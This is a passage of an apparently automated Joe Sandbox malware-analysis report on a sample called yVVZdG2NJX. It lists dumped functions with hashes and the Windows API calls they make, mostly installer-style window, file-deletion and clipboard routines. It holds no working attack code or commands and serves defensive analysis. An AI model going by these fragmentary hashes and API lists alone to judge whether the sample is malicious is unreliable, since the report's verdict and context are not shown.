                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0e67470b5fb9f6d3c5a05778ae2d9cad28b5ee0b02dc05581400c8c3a599b350
                                                                      • Instruction ID: 02a93fa424a7413952efbf294434530bc0f2cfea5693d68819ed72215d0e8eb4
                                                                      • Opcode Fuzzy Hash: 0e67470b5fb9f6d3c5a05778ae2d9cad28b5ee0b02dc05581400c8c3a599b350
                                                                      • Instruction Fuzzy Hash: CB110C70A003159FEB069B78880576E7F96DF8D700F20422EE45A977D1DFB54952CB91
                                                                      Function 000AD0F7 Relevance: .1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585094739.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ad000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 400768c402500e0810e25ff10fc9f67231d92f9f2dab9f09d81619b13d114b48
                                                                      • Instruction ID: 48a2640a348de244266a7cd403d4429bd73a665d2a732d21a502ebf1071ef5e0
                                                                      • Opcode Fuzzy Hash: 400768c402500e0810e25ff10fc9f67231d92f9f2dab9f09d81619b13d114b48
                                                                      • Instruction Fuzzy Hash: 4511DD75504280DFDB06CF50D9C4B15BFB2FB85314F28C6AADC4A4BA56C33AD84ACB62
                                                                      Function 000AD017 Relevance: .1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585094739.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ad000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 969470863826356b1389e68aa90421f9e17ae83dbe53374e76a1f0993af0c94d
                                                                      • Instruction ID: 9823b860c624e225f4621456da462f9a8c25882c22b6c6b654bbabdeb74eec69
                                                                      • Opcode Fuzzy Hash: 969470863826356b1389e68aa90421f9e17ae83dbe53374e76a1f0993af0c94d
                                                                      • Instruction Fuzzy Hash: 4711BF75504280CFDB16CF60D5C4B15BFA1FB85318F28C6AED84A4BA56C33AD84ACB92
                                                                      Function 36915308 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3a1fd46c2cc024ec9396ff47d0322e60f050b8dd40ffabab30777a8c1b8ef79
                                                                      • Instruction ID: ffe6c031ef5ba9c34d47592309d93150360019e22220830c0cab1dc65b0211e4
                                                                      • Opcode Fuzzy Hash: a3a1fd46c2cc024ec9396ff47d0322e60f050b8dd40ffabab30777a8c1b8ef79
                                                                      • Instruction Fuzzy Hash: 7201DD70B10318DFEB05AF78881536E7BA6EB8D710F21412AE41A937D1DFB59D428BD1
                                                                      Function 369153C7 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2309a3cb413600ab90b23cfcb2dccc56c9d547b733d104ca85e6de2bf73aebb3
                                                                      • Instruction ID: c3a7eabb341af033a858227af7e3378e6110ec0301a6c49543f41cd3a6d6aadc
                                                                      • Opcode Fuzzy Hash: 2309a3cb413600ab90b23cfcb2dccc56c9d547b733d104ca85e6de2bf73aebb3
                                                                      • Instruction Fuzzy Hash: B701F7B0F042559FDB06E77848113EE7BA1BF85201F30416EE045D73C1EA708A128BC6
                                                                      Function 369117C1 Relevance: .0, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e12123f64c3042d97fa8b58f15faf17ebe51354f30b57cb604ca766a4e52db46
                                                                      • Instruction ID: 7691c791c34b09971c5e3e6cec1315c111fee50a156d131437e325a2d81e9e2b
                                                                      • Opcode Fuzzy Hash: e12123f64c3042d97fa8b58f15faf17ebe51354f30b57cb604ca766a4e52db46
                                                                      • Instruction Fuzzy Hash: 711130B5D003498FCB20CF9AC585BDEBBF4EF49314F208419D959A7210D338A944CFA1
                                                                      Function 369117C8 Relevance: .0, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 566d2f9c14dabe241ff629dab33fd2648f875a4bc8b84410b198dcf8e3b64aff
                                                                      • Instruction ID: c2126fe5537369b31ae753fc5384f49da331a69baf93e43c66546a17d086f963
                                                                      • Opcode Fuzzy Hash: 566d2f9c14dabe241ff629dab33fd2648f875a4bc8b84410b198dcf8e3b64aff
                                                                      • Instruction Fuzzy Hash: 12111EB5D003498FCB20CF9AD885BDEBBF4EB49324F208459D959A7250D378A944CFA1
                                                                      Function 36914535 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 405308699dfc1c00987a733bd1bd79577edb01eaba5cb6c53970618cea45e8fd
                                                                      • Instruction ID: 16eefedee4c0c8e87171b38388d91c196b4f7724dce4c99003763882f69eb93e
                                                                      • Opcode Fuzzy Hash: 405308699dfc1c00987a733bd1bd79577edb01eaba5cb6c53970618cea45e8fd
                                                                      • Instruction Fuzzy Hash: 48D0673AB001089FDB149F98EC409DDB7B6FB98221B048116E916A3660C7319921DB51
                                                                      Function 36912937 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 26d4a16b007f211a49945a7a4422082574d4a4da4b943640d08ef33ab1c8acb6
                                                                      • Instruction ID: 92d187c2c1825290a5886ac0d9ba45846acfd4e1d911d74cebf9de556bcca758
                                                                      • Opcode Fuzzy Hash: 26d4a16b007f211a49945a7a4422082574d4a4da4b943640d08ef33ab1c8acb6
                                                                      • Instruction Fuzzy Hash: 2FD02BB06187808FFB13E774A48ABD57F756F92000FC4C56CE8DB05952C9B52A038F91
                                                                      Function 36910F59 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 506071921b8bb1c9a33ea09c249d664f164072f7bb5c2f6b93276772f5edc78c
                                                                      • Instruction ID: c1babb1693b3f8e05d8db659db99771bf6008ebb372d1c902b7fa37eb7bc189a
                                                                      • Opcode Fuzzy Hash: 506071921b8bb1c9a33ea09c249d664f164072f7bb5c2f6b93276772f5edc78c
                                                                      • Instruction Fuzzy Hash: BFD0A73A90020CCBEF01CF81E8416CCFB71FB98324F208163D61422250CB324A60DFD1
                                                                      Function 36912948 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a460401e4b285c4d4323d6d7cd102672af5d5dd5ea1aaf74eb942ccc4816f860
                                                                      • Instruction ID: c4defd37c0c73348fcbc2a9cfb856c369fea8ce39763c6ce979e764c3b982518
                                                                      • Opcode Fuzzy Hash: a460401e4b285c4d4323d6d7cd102672af5d5dd5ea1aaf74eb942ccc4816f860
                                                                      • Instruction Fuzzy Hash: 27C012B05203084FDA03E771F846655732EABD15047C0C511B44A09526DEB42A464AA1
                                                                      Function 369152E3 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e050ebf7a128982b9a96bdd1d3ef6cf020d12c55119bb0636ac16876ee286505
                                                                      • Instruction ID: 2c95be2611d5d2c6b68ce04f9196e3ddfee97aeaf9980178d58d1a1d9113a311
                                                                      • Opcode Fuzzy Hash: e050ebf7a128982b9a96bdd1d3ef6cf020d12c55119bb0636ac16876ee286505
                                                                      • Instruction Fuzzy Hash: 2DC0482228F3E22ECF03473458280897F704A9320031AA0E6D082CB2A3CA04081AD362

                                                                      Non-executed Functions

                                                                      Function 00404C7B Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                                                      • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                                                      • DeleteObject.GDI32(00000000), ref: 00404D71
                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0040509B
                                                                      • GlobalFree.KERNEL32(?), ref: 004050AB
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                                                      • InvalidateRect.USER32(?,00000000,?), ref: 004051FC
                                                                      • ShowWindow.USER32(?,00000000), ref: 0040524A
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                                                      • ShowWindow.USER32(00000000), ref: 0040525C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: d51f85f8d95834ec81a3e8aa82d4b0f7780387708cc2f6482410258e2394dffd
                                                                      • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
                                                                      • Opcode Fuzzy Hash: d51f85f8d95834ec81a3e8aa82d4b0f7780387708cc2f6482410258e2394dffd
                                                                      • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
                                                                      Function 004059A9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DeleteFileW.KERNEL32(?,?), ref: 004059D2
                                                                      • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?), ref: 00405A1A
                                                                      • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?), ref: 00405A3D
                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?), ref: 00405A43
                                                                      • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?), ref: 00405A53
                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                                                      • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: (?z$.$.$\*.*
                                                                      • API String ID: 2035342205-1515725298
                                                                      • Opcode ID: 055fc45d478fb46821b4c1b9f61a2cf5f882e22ca3136cc8209be43affe2ce83
                                                                      • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                                                      • Opcode Fuzzy Hash: 055fc45d478fb46821b4c1b9f61a2cf5f882e22ca3136cc8209be43affe2ce83
                                                                      • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E
                                                                      Function 004065DA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,007A4F70,?,00401676,00000000), ref: 004065E5
                                                                      • FindClose.KERNEL32(00000000,?,00401676,00000000), ref: 004065F1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: pOz
                                                                      • API String ID: 2295610775-1820424874
                                                                      • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                      • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                                                      • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                      • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
                                                                      Function 0040543E Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040549C
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004054AB
                                                                      • GetClientRect.USER32(?,?), ref: 004054E8
                                                                      • GetSystemMetrics.USER32(00000002), ref: 004054EF
                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
                                                                      • ShowWindow.USER32(?,00000008), ref: 0040558B
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004055AC
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004054BA
                                                                        • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,?,0040406E), ref: 00404251
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004055FE
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405613
                                                                      • ShowWindow.USER32(00000000), ref: 00405637
                                                                      • ShowWindow.USER32(?,00000008), ref: 0040563C
                                                                      • ShowWindow.USER32(00000008), ref: 00405686
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
                                                                      • CreatePopupMenu.USER32 ref: 004056CB
                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
                                                                      • GetWindowRect.USER32(?,?), ref: 004056FF
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
                                                                      • OpenClipboard.USER32(00000000), ref: 00405760
                                                                      • EmptyClipboard.USER32 ref: 00405766
                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040577C
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004057B0
                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
                                                                      • CloseClipboard.USER32 ref: 004057C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID: {
                                                                      • API String ID: 590372296-366298937
                                                                      • Opcode ID: 17a21c63557b4cf9ffe78a5fd5086114b1c8428fb936cdfcd18ae7c9549b7d0c
                                                                      • Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
                                                                      • Opcode Fuzzy Hash: 17a21c63557b4cf9ffe78a5fd5086114b1c8428fb936cdfcd18ae7c9549b7d0c
                                                                      • Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58
                                                                      Function 00403D35 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                                                      • ShowWindow.USER32(?), ref: 00403D8E
                                                                      • DestroyWindow.USER32 ref: 00403DA2
                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                                                      • GetDlgItem.USER32(?,?), ref: 00403DDF
                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                                                      • GetDlgItem.USER32(?,?), ref: 00403EA8
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                                                      • SendMessageW.USER32(0000040F,00000000,?), ref: 00403F1D
                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                                                      • EnableWindow.USER32(?,?), ref: 00403FF6
                                                                      • EnableWindow.USER32(?,?), ref: 00404011
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404027
                                                                      • EnableMenuItem.USER32(00000000), ref: 0040402E
                                                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404046
                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                                                      • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                                                      • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                                                      • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                      • String ID:
                                                                      • API String ID: 184305955-0
                                                                      • Opcode ID: ee67474a1a288a69095d81a28a6b41206e342fd1b930cad1f65484e832d6543b
                                                                      • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                                                      • Opcode Fuzzy Hash: ee67474a1a288a69095d81a28a6b41206e342fd1b930cad1f65484e832d6543b
                                                                      • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E
                                                                      Function 00403987 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                        • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                      • lstrcatW.KERNEL32(007B5000,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,007B5800,774D3420,007B3000,00000000), ref: 00403A08
                                                                      • lstrlenW.KERNEL32(007A69C0,007B3800,?,?,007A69C0,00000000,007B3800,007B5000,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,007B5800), ref: 00403A88
                                                                      • lstrcmpiW.KERNEL32(007A69B8,.exe,007A69C0,007B3800,?,?,007A69C0,00000000,007B3800,007B5000,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                                                      • GetFileAttributesW.KERNEL32(007A69C0), ref: 00403AA6
                                                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,007B3800), ref: 00403AEF
                                                                        • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                      • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                                                      • ShowWindow.USER32(00000005), ref: 00403BAF
                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                                                      • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                                                      • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                                                      • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
